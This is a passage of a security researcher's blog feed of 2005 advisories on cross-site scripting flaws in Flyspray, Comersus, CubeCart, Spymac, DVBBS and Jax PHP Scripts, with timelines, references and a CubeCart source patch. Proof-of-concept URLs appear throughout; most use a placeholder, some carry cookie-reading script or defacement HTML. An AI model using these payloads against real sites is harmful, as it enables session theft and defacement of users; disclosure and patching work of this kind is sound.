/><br />http://[Victim]/blogs/index.php?curr=349030[XSS-CODE]<br /><br />http://[Victim]/blogs/blog_newentry.php?inspire=134403[XSS-CODE]<br />&system=blogentries&title=Blogs%20now%20online<br /><br />http://[Victim]/blogs/blog_newentry.php?inspire=134403&system=<br />blogentries[XSS-CODE]&title=Blogs%20now%20online<br /><br />http://[Victim]/blogs/blog_newentry.php?inspire=134403&system=<br />blogentries&title=Blogs%20now%20online[XSS-CODE]<br /><br />http://[Victim]/blogs/blog_newentry_comment.php?entry=113733[XSS-CODE]<br /><br />http://[Victim]/blogs/blog.php?pageid=113733&caldate=1128146400[XSS-CODE]<br /><br />http://[Victim]/blogs/blog_edit_entry.php?entry=113733[XSS-CODE]<br /><br />http://[Victim]/blogs/blog.php?pageid=260&label=Cool%20Stuff<br />&caldate=1128146400[XSS-CODE]<br /><br />###########<br />IN NOTES<br />###########<br /><br />http://[Victim]/notes/index.php?action=noteform&forwardid=469397[XSS-CODE]<br />http://[victim]/notes/index.php?action=delete_folder&del_folder=qq[XSS-CODE]<br />http://[Victim]/notes/index.php?curr=100&isread=asc[XSS-CODE]<br />http://[victim]/notes/index.php?curr=100&dateorder=asc[XSS-CODE]<br />http://[victim]/notes/index.php?curr=100&subjectorder=asc[XSS-CODE]<br />http://[victim]/notes/index.php?curr=100[XSS-CODE]<br />http://[victim]/notes/index.php?isread=asc[XSS-CODE]<br />http://[Victim]/notes/index.php?fromorder=asc[XSS-CODE]<br />http://[Victim]/notes/index.php?fromorder=asc&action=search_title[XSS-CODE]<br />http://[Victim]/notes/index.php?action=shownote¬eid=243633[XSS-CODE]<br />http://[Victim]/notes/index.php?action=noteform[XSS-CODE]&replyid=243633<br />http://[Victim]/notes/index.php?action=Inbox[XSS-CODE]<br />http://[Victim]/notes/index.php?totalnotes=&ppp=10&ppp=40[XSS-CODE]&action=Inbox<br />http://[Victim]/notes/index.php?totalnotes=[XSS-CODE]&ppp=10&ppp=30<br />http://[Victim]/notes/index.php?totalnotes=&ppp=10&ppp=40&totalreplies=asc[XSS-CODE]&action=Inbox<br />http://[Victim]/notes/index.php?action=noteform&touserid=172195[XSS-CODE]<br /><br />######################## €nd #########################<br /><br />thnx to estrella to be my ligth<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1130174068657301982005-10-26T10:13:00.000-07:002013-04-19T08:48:51.006-07:00Flyspray "The bug killer" multiple variable Cross-Site Scripting####################################################<br />
Flyspray "The bug killer" multiple variable Cross-Site Scripting<br />
vendor url:http://flyspray.rocks.cc/<br />
Vendor specific bug report: http://flyspray.rocks.cc/bts/task/703<br />
Advisore:http://lostmon.blogspot.com/2005/10/<br />
flyspray-bug-killer-multiple-variable.html<br />
vendor notify:yes exploit available:yes<br />
OSVDB ID:<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=20326" target="_BLANK">20326</a><br />
Secunia:<a href="http://secunia.com/advisories/17316/" target="_BLANK">17316</a><br />
BID:<a href="http://www.securityfocus.com/bid/15209" target="_BLANK">15209</a><br />
#####################################################<br />
<br />
Flyspray is an uncomplicated, web-based bug tracking system for<br />
assisting with software development.<br />
<br />
Flyspray "The bug killer" contains a flaw that allows a remote<br />
cross site scripting attack.This flaw exists because the application<br />
does not validate multiple variables upon submission to index.php<br />
script.This could allow a user to create a specially crafted URL that<br />
would execute arbitrary code in a user's browser within the trust <br />
relationship between the browser and the server,<br />
leading to a loss of integrity.<br />
<br />
##################<br />
versions<br />
##################<br />
<br />
Flyspray 0.9.7<br />
Flyspray 0.9.8<br />
Flyspray 0.9.8 (devel) <br />
<br />
<br />
##################<br />
solution<br />
##################<br />
<br />
Update to version Flyspray 0.9.8 update1<br />
<br />
###################<br />
TimeLine<br />
###################<br />
<br />
Discovered:20-10-2005<br />
Vendor notify:24-10-2005<br />
Vendor response:25-10-2005<br />
Disclosure:26-10-2005<br />
<br />
<br />
####################<br />
Examples<br />
####################<br />
<br />
http://[victim]/index.php?PHPSESSID=270ca5a0f7c1e5b2fd4c<br />
52b34cdfe546&tasks=&project=1&string=lala&type=&sev=&due=<br />
&dev=&cat=&status=&perpage=20<br />
<br />
variables PHPSESSID, task,string,type,serv,due,dev are<br />
afected by XSS flaws.<br />
<br />
http://[victim]/index.php?tasks=all%22%3E%3Cscript<br />
%3Ealert%28%29%3C%2Fscript%3E&project=0<br />
<br />
variable task afected.<br />
<br />
http://[victim]/index.php?order=sev&project=1&tasks=&type=<br />
&sev=&dev=&cat=&status=&due=&string=&perpage=20&pagenum=0&<br />
sort=desc&order2=&sort2=desc<br />
<br />
task,type,due,string,sort2, these variables are<br />
afected by XSS flaws.<br />
<br />
########################## €nd #############################<br />
<br />
thnx to estrella to be my ligth<br />
-- <br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1129487979047181142005-10-16T11:38:00.000-07:002005-10-18T09:23:27.373-07:00Comersus BackOffice Plus Cross site scripting#####################################################<br />Comersus BackOffice Plus Cross site scripting<br />Vendor url:http://www.comersus.com/demo.html<br />Advisore:http://lostmon.blogspot.com/2005/10/<br />comersus-backoffice-plus-cross-site.html<br />vendor notify:yes exploit available:yes<br />OSVDB ID:<a href="http://osvdb.org/displayvuln.php?osvdb_id=20032" target="_BLANK">20032</a><br />Secunia:<a href="http://secunia.com/advisories/17219/" target="_BLANK">17219</a><br />Securitytracker:<a href="http://securitytracker.com/id?1015064" target="_BLANK">1015064</a><br />BID:<a href="http://securityfocus.com/bid/15118" target="_BLANK">15118</a><br />######################################################<br /><br /><br />Comersus BackOffice Plus contains a flaw that allows a remote<br />cross site scripting attack.This flaw exists because the <br />application does not validate some variables upon submission to<br />comersus_backoffice_searchItemForm.asp script.This could allow<br />a user to create a specially crafted URL that would execute <br />arbitrary code in a user's browser within the trust relationship<br />between the browser and the server,leading to a loss of integrity.<br /><br />#############<br />version:<br />##############<br /><br />Comersus Backoffice plus<br /><br />###########<br />solution:<br />###########<br /><br />No solution was available at this time.<br /><br /><br />####################<br />Timeline<br />####################<br /><br />discovered: 24-09-2005<br />vendor notify:28-09-2005<br />vendor response:28-09-2005<br />vendor especific bug report: 7-10-2005<br />Vendor response:-----------<br />disclosure: 16-10-2005<br /><br />##################<br />Proof of comcept:<br />##################<br /><br />For exploit this flaw you must be logged...<br /><br />http://[victim]/backOfficePlus/comersus_backoffice_searchItemForm.asp?<br />forwardTo1=[XSS-CODE]comersus_backoffice_listAssignedCategories.asp&<br />forwardTo2=[XSS-CODE]&nameFT1=[XSS-CODE]Select&nameFT2=[XSS-CODE]<br /><br />all variables are vulnerables to Cross site<br />scripting<br /><br />##################### €nd #####################<br /><br />Thnx to estrella to be my ligth<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1127926403154050352005-09-28T09:51:00.000-07:002005-10-07T10:41:28.360-07:00CubeCart™ 3.0.3 multiple variable Cross site scripting################################################<br />CubeCart™ 3.0.3 multiple variable Cross site scripting<br />Vendor url: www.cubecart.com<br />bug report:http://bugs.cubecart.com/?do=details&id=363<br />Advisore:http://lostmon.blogspot.com/2005/09/<br />cubecart-303-multiple-variable-cross.html<br />vendor confirmed: yes exploit avalable: yes <br />Fix available: yes<br />OSVDB ID:<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=19860" target="_BLANK">19860</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=19861" target="_BLANK">>19861</a><br />Securitytracker:<a href="http://securitytracker.com/id?1014984" target="_BLANK">1014984</a> <br />BID:<a href="http://securityfocus.com/bid/14962" target="_BLANK">14962</a><br />################################################<br /><br />CubeCart contains a flaw that allows a remote cross site scripting<br />attack.This flaw exists because the application does not validate <br />some variables upon submission to cart.php and index.php scripts.<br />This could allow a user to create a specially crafted URL that <br />would execute arbitrary code in a user's browser within the trust<br />relationship between the browser and the server,leading to a<br />loss of integrity.<br /><br />###############<br />VERSIONS<br />###############<br /><br />CubeCart™ 3.0.3 vulnerable <br />CubeCart™ 3.0.4 not vulnerable<br /><br />#################<br />Timeline<br />#################<br /><br />Discovered: 24 sep 2005<br />vendor notify: 24 sep 2005<br />Vendor response:26 sep 2005<br />Solution: 28 sep 2005<br />Disclosure:24 sep 2005 <br />Public disclosure: 28 sep 2005<br /><br />###############<br />Examples:<br />###############<br /><br />http://victim]/cc3/cart.php?act=reg&redir=L3NpdGUvZGVt<br />by9jYzMvaW5kZXgucGhwP3NlYXJjaFN0cj0lMjIlM0UlM0NzY3JpcH<br />QlM0VhbGVydCUyOCUyOSUzQyUyRnNjcmlwdCUzRSZhbXA7YWN0PXZpZ<br />XdDYXQmYW1wO1N1Ym1pdD1Hbw==[XSS-CODE]<br /><br />http://[victim]/cc3/cart.php?act=reg&redir=[XSS-CODE]<br /><br /><br />http://[victim]cc3/index.php?searchStr=%3D%22%3E%3Cscript<br />%3Ealert%28document.cookie%29%3C%2Fscript%3E&act=viewCat<br />&Submit=Go<br /><br />http://[victim]cc3/index.php?act=login&redir=L3NpdG<br />UvZGVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3RG9jJmFtcDtkb<br />2NJZD0x[XSS-CODE]<br /><br />#############<br />SOLUTION <br />#############<br /><br />The vendor has release a fix.<br />and the follow URI are available for download<br />the latest version of CubeCart.<br /><br />http://www.cubecart.com/site/forums/index.php?download=222<br /><br />Thnx to all CubeCart Tem , they make a very Good work !!!<br /><br />################################################<br />MANUAL FIX<br />################################################<br />///////////////////////////////////////<br />// 1. Open: /includes/content/reg.inc.php<br />////////<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Find at around line 123:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$redir = base64_decode($_GET['redir']);<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Replace with:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$redir = base64_decode(treatGet($_GET['redir']));<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Find at around line 170:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$reg->assign("VAL_ACTION","cart.php?act=reg&<br />redir=".$_GET['redir']);<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Replace with:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$reg->assign("VAL_ACTION","cart.php?act=reg&<br />redir=".treatGet($_GET['redir']));<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Save, close and upload this file.<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br />///////////////////////////////////////<br />// 2. Open: /includes/content/login.inc.php<br />////////<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Find at around line 55:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />header("Location: ".str_replace("&","&",<br />base64_decode($_GET['redir'])));<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Replace with:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />header("Location: ".str_replace("&","&",<br />base64_decode(treatGet($_GET['redir']))));<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Find at around line 74:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$login->assign("VAL_SELF",$_GET['redir']);<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Replace with:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$login->assign("VAL_SELF",treatGet($_GET['redir']));<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Save, close and upload this file.<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br />///////////////////////////////////////<br />// 3. Open: /includes/boxes/searchForm.inc.php<br />////////<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Find at around line 40:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$box_content->assign("SEARCHSTR",$_GET['searchStr']);<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Replace with:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$box_content->assign("SEARCHSTR",treatGet($_GET['searchStr']));<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Save, close and upload this file.<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br />///////////////////////////////////////<br />// 4. Open: /includes/content/viewCat.inc.php<br />////////<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Find at around line 108:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$searchwords = split ( "[ ,]", $_GET['searchStr']);<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Replace with:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$searchwords = split ( "[ ,]", treatGet($_GET['searchStr']));<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Find at around line 308:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$view_cat->assign("TXT_NO_PRODUCTS",$lang['front']['viewCat']['no_products_match']." ".$_GET['searchStr']);<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Replace with:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$view_cat->assign("TXT_NO_PRODUCTS",$lang['front']['viewCat']['no_products_match']." ".treatGet($_GET['searchStr']));<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Save, close and upload this file.<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br />///////////////////////////////////////<br />// 5. Open: /includes/functions.inc.php<br />////////<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />At around line 25 find:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />| functions.inc.php<br />| ========================================<br />| Core Frontend Functions <br />+----------------------------------------------<br />*/<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Directly under this add:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />//////////////////////////////////<br />// treat GET vars stop XSS<br />////////<br />function treatGet($text){<br /> <br /> $text = preg_replace("/(\<script)(.*?)(script>)/si", "", "$text");<br /> $text = strip_tags($text);<br /> $text = str_replace(array("'","\"",">","<","\\"), "", $text);<br /> return $text;<br /> <br />}<br /><br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />At around line 384 find:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />function currentPage(){<br /> <br /> $currentPage = $_SERVER['PHP_SELF'];<br /> <br /> if (isset($_SERVER['QUERY_STRING'])) {<br /> <br /> $currentPage .= "?" . htmlentities($_SERVER['QUERY_STRING']);<br /> <br /> }<br /> <br /> return $currentPage;<br /><br />}<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Replace this with:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />function currentPage(){<br /> <br /> $currentPage = $_SERVER['PHP_SELF'];<br /> <br /> if (isset($_SERVER['QUERY_STRING'])) {<br /> <br /> $currentPage .= "?" . htmlentities(treatGet($_SERVER['QUERY_STRING']));<br /> <br /> }<br /> <br /> return $currentPage;<br /><br />}<br /><br />///////////////////////////////////////<br />// 6. Open: /includes/ini.inc.php<br />////////<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Find at around line 108:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$ini['ver'] = '3.0.3';<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Replace with:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />$ini['ver'] = '3.0.4';<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Save, close and upload this file.<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />// end of manual fix :O)<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />##################### €nd ########################<br /><br />Thnx to estrella to be my ligth<br />Thnx to all manglers of http://www.osvdb.org<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1127072928034111552005-09-18T12:40:00.000-07:002005-09-24T04:00:31.193-07:00Multiple variable XSS in Spymac Web Os v4.0UPDATE 20 sep 2005 :<br />VERSION AFECTED: Spymac v4 <br /><br />#########################################################<br />Multiple variable XSS in Spymac Web Os v4.0<br />vendor url:http://www.spymac.com/<br />Advisory:http://lostmon.blogspot.com/2005/09/<br />multiple-variable-xss-in-spymac-web-os.html<br />Vendor notified : yes exploit avaible : yes<br />OSVDB ID:<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=19613" target="BLANK">19613</a><br />Securitytracker:<a href="http://securitytracker.com/id?1014928" target="_BLANK">1014928</a><br />#########################################################<br /><br />Spymac is powered by an integrated collection of applications<br />(developed in-house)that together form "Spymac WOS". Spymac<br />WOS is an intelligent environment featuring patent-pending <br />technology that allows for the creation of an immersive and<br />visually-stunning Web experience.<br /><br />Spymac flaw that allows a remote cross site scripting attack.<br />This flaw exists because the application does not validate some<br />variables upon submission to some scripts.This could allow a user<br />to create a specially crafted URL that would execute arbitrary<br />code in a user's browser within the trust relationship between the<br />browser and the server,leading to a loss of integrity.<br /><br />############<br />version afected<br />############<br /><br />Spymac web os v4<br />Spymac Web Os 3.0 beta 190<br /><br />#########<br />Solution<br />#########<br /><br />No solution was available at this time.<br /><br />##########<br />timeline<br />##########<br /><br />Discovered : 17 sep 2005<br />Vendor notify: 17 sep 2005<br />Vendor response:<br />Disclosure :17 sep 2005<br />Public disclosure:17 sep 2005<br /><br /><br />############<br />Examples<br />############<br /><br />http://[victim]/forums/showthread.php?threadid=195681[XSS-CODE]<br /><br />http://[victim]/forums/showthread.php?threadid=195805&postid=3579278[XSS-CODE]#post_3579278<br /><br />http://[victim]/forums/showthread.php?threadid=195605&curr=0[XSS-CODE]<br /><br />########################### €nd ############################<br /><br />Thnx to estrella to be my ligth.<br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1126457491291292092005-09-11T09:46:00.000-07:002005-09-21T09:19:20.033-07:00Spymac Web os 4.0 variable XSS#######################################################<br />Spymac Web os 4.0 variable XSS<br />vendor url:http://www.spymac.com/<br />Advisory:http://lostmon.blogspot.com/2005/09/<br />spymac-web-os-40-variable-xss.html<br />Vendor notified : yes exploit avaible : yes<br />OSVDB ID: <a href="http://www.osvdb.org/displayvuln.php?osvdb_id=19438" target="_BLANK">19438</a><br />Securitytracker:<a href="http://securitytracker.com/id?1014883" target="_BLANK">1014883</a><br />########################################################<br /><br />Spymac is powered by an integrated collection of applications<br />(developed in-house)that together form "Spymac WOS". Spymac<br />WOS is an intelligent environment featuring patent-pending <br />technology that allows for the creation of an immersive and<br />visually-stunning Web experience.<br /><br />Spymac flaw that allows a remote cross site scripting attack.<br />This flaw exists because the application does not validate <br />'category' variable upon submission to 'index.php script.<br />This could allow a user to create a specially crafted URL<br />that would execute arbitrary code in a user's browser within<br />the trust relationship between the browser and the server,<br />leading to a loss of integrity.<br /><br />############<br />version afected <br />############<br /><br />Spymac Web Os 4.0<br /><br />#########<br />Solution<br />#########<br /><br />No solution at this time <br /><br />##########<br />timeline<br />##########<br /><br />Discovered : 10 sep 2005<br />Vendor notify: 10 sep 2005<br />Vendor response: 10 sep 2005<br />Disclosure : 10 sep 2005<br />Public disclosure: 11 sep 2005<br /><br />############<br />Examples<br />############<br /><br />http://[victim]/index.php?category=1%22%3E%3Cbody%3E%3Ch1%3ESe%20busca<br />%20H4x0r%3C/h1%3E%3Cp%3E%20es%20peligroso%20y%20va%20armado%3Cbr%3E%20<br />Lleva%20un%20portatil%20y%20un%20palm%20en%20las%20manos%3Cbr%3E%20si%<br />20le%20ven%20;%20no%20le%20proporcionen%20conexion%20a%20internet.%3C/p<br />%3E%3Cp%3E%3C/p%3E3Cimg20src=http://www.ttvn.com.vn/Uploaded/administrator/<br />hacker.jpg%3E%3Ch1%3EBy%20Lostmon%3C/h1%3E%3C/body%3E<br /><br />############################# €nd ##########################<br /><br />THnx To estrella to be my ligth...<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1123491558755294492005-08-08T01:58:00.000-07:002005-08-22T11:46:55.120-07:00DVBBS Multiple variable Cross site scripting#############################################<br />DVBBS Multiple variable Cross site scripting<br />vendor url:http://down.dvbbs.net/<br />SoftView/SoftView_2455.html<br />Advisory:http://lostmon.blogspot.com/2005/08/<br />dvbbs-multiple-variable-cross-site.html<br />vendor notify:yes exploit available:yes<br />OSVDB ID:<a href="http://osvdb.org/displayvuln.php?osvdb_id=18512" target="_BLANK">18512</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18679" target="_BLANK">18679</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18680" target="_BLANK">18680</a><br />Securitytracker: <a href="http://securitytracker.com/id?1014632" target="_BLANK">1014632</a><br />BID:<a href="http://securityfocus.com/bid/14498" target="_BLANK">14498</a><br />Secunia: <a href="http://secunia.com/advisories/16131/" target="_BLANK">SA16131</a><br />#############################################<br /><br />DVBBS contains a flaw that allows a remote cross site scripting<br />attack.This flaw exists because the application does not validate<br />multiple variables upon submission to multiple scripts.This could<br />allow a user to create a specially crafted URL that would execute<br />arbitrary code in a user's browser within the trust relationship<br />between the browser and the server, leading to a loss of integrity<br /><br /><br />############<br />solution<br />############<br /><br />no solution available at this time !<br /><br /><br />############<br />versions<br />############<br /><br />Dvbbs 7.1 Sp2<br />Dvbbs 7.1 <br /><br />#############<br />timeline<br />#############<br /><br />discovered:21-jul-2005<br />disclosure:21-jul-2005<br />public disclosure:08-ago-2005<br /><br />####################<br />proof of concept<br />####################<br /><br /><br />http://[VICTIM]/dispbbs.asp?boardID=8&ID=550194&page=1[XSS-CODE]<br /><br />http://[VICTIM]/dispuser.asp?name=Walltrapass[XSS-CODE]<br /><br />http://[VICTIM]/boardhelp.asp?boardid=0&act=2&title=[XSS-CODE]<br />http://[VICTIM]/boardhelp.asp?boardid=0&view=faq[XSS-CODE]&act=3<br />http://[VICTIM]/boardhelp.asp?boardid=0&view=faq&act=3[XSS-CODE]<br />http://[VICTIM]/boardhelp.asp?boardid=0&act=2[XSS-CODE]&title=<br /><br />######################## €nd ##########################<br /><br />Thnx to estrella to be my ligth<br /><br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1123232790441925342005-08-05T01:49:00.000-07:002005-08-08T01:08:27.350-07:00Jax PHP Scripts multiple vulnerabilities############################################<br />Jax PHP Scripts multiple vulnerabilities<br />vendor url:http://www.jtr.de/scripting/php/<br />Advisory:http://lostmon.blogspot.com/2005/08/<br />jax-php-scripts-multiple.html<br />vendor notify:yes exploit available:yes<br />OSVDB ID:<a href="http://osvdb.org/displayvuln.php?osvdb_id=18568" target="_BLANK">18568</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18569" target="_BLANK">18569</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18570" target="_BLANK">18570</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18571" target="_BLANK">18571</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18572" target="_BLANK">18572</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18573" target="_BLANK">18573</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18574" target="_BLANK">18574</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18575" target="_BLANK">18575</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18576" target="_BLANK">18576</a>,<br /><a href="http://osvdb.org/displayvuln.php?osvdb_id=18577" target="_BLANK">18577</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18578" target="_BLANK">18578</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18579" target="_BLANK">18579</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18580" target="_BLANK">18580</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18581" target="_BLANK">18581</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18582" target="_BLANK">18582</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18583" target="_BLANK">18583</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18584" target="_BLANK">18584</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18585" target="_BLANK">18585</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=18586" target="_BLANK">18586</a>,<br />Secunia: <a href="http://secunia.com/advisories/16332/" target="_BLANK">SA16332</a>,<a href="http://secunia.com/advisories/16333/ target="_BLANK"">SA16333</a>,<a href="http://secunia.com/advisories/16337/" target="_BLANK">SA16337</a>,<a href="http://secunia.com/advisories/16338/" target="_BLANK">SA16338</a><br />BID: <a href="http://securityfocus.com/bid/14481" target="_BLANK">14481</a><br />#############################################<br /><br /><br />###########<br />sumary:<br />###########<br /><br />0- Description.<br />1- Products affected.<br />2- Jax Guestbook report. <br />3- Jax Petitionbook report.<br />4- Jax Newsletter report.<br />5- Jax LinkLists report.<br />6- Jax Calendar report.<br />7- Jax DWT Editor report.<br />8- Timeline<br /><br />###############<br />0- Description<br />###############<br /><br />Jax scripts is a collection of usefull php scripts to added or include in a web-site.<br /><br />Jax Guestbook (GPL)* ==> php script for running a WWW Guestbook<br /><br />Jax Petitionbook (GPL)* ==> adaption of Jax Guestbook for running a WWW Petitionbook <br /> <br />Jax Newsletter (GPL)* ==> php script for running online Mailing lists / Newsletters <br />(Mailing List Manager) <br /> <br />Jax LinkLists (GPL)* ==> php script for running simple Hyperlink Lists <br />(Hyperlink Manager) <br /> <br />Jax Calendar (GPL)* ==> php script for running a simple Web Calendar <br />(calendar manager) <br /> <br />Jax DWT Editor (GPL)* ==> php script for editing html files based on 